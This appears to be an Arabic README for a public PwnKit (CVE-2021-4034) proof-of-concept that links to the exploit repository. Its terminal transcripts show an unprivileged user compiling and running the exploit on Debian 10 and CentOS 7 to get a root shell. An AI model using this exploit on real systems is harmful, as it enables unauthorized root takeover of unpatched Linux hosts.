
إثبات مفهوم لاستغلال CVE-2021-4034 (PwnKit)، وهو تصعيد صلاحيات محلي في pkexec الخاص بـ polkit، تم التحقق منه على Debian 10 و CentOS 7.

على الرغم من أن هذه الثغرة الأمنية غير قابلة للاستغلال عن بُعد ولا تسمح بحد ذاتها بتنفيذ تعليمات برمجية عشوائية، إلا أنها يمكن أن يستخدمها المهاجمون الذين تمكنوا بالفعل من الحصول على موطئ قدم على مضيف ضعيف لتصعيد صلاحياتهم وتحقيق تلك القدرة.
https://seclists.org/oss-sec/2022/q1/80https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034
تم التحقق منه على Debian 10 و CentOS 7.
يمكنك العثور على المستودع عبر هذا الرابط ← https://github.com/Yakumwamba/POC-CVE-2021-4034.git
user@debian:~$ grep PRETTY /etc/os-release
PRETTY_NAME="Debian GNU/Linux 10 (buster)"
user@debian:~$ id
uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
user@debian:~$ gcc cve-2021-4034-poc.c -o cve-2021-4034-poc
user@debian:~$ ./cve-2021-4034-poc
# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),1000(user)
[user@centos ~]$ grep PRETTY /etc/os-release
PRETTY_NAME="CentOS Linux 7 (Core)"
[user@centos ~]$ id
uid=11000(user) gid=11000(user) groups=11000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[user@centos ~]$ gcc cve-2021-4034-poc.c -o cve-2021-4034-poc
[user@centos ~]$ ./cve-2021-4034-poc
sh-4.2# id
uid=0(root) gid=0(root) groups=0(root),11000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
sh-4.2# exit
يمكن استخدامها أيضًا لإلحاق الضرر بخوادم Linux غير المحدثة أو تعطيلها. مؤلف هذه الأداة غير مسؤول عن أي أضرار أو خسائر قد تحدث نتيجة استخدامها.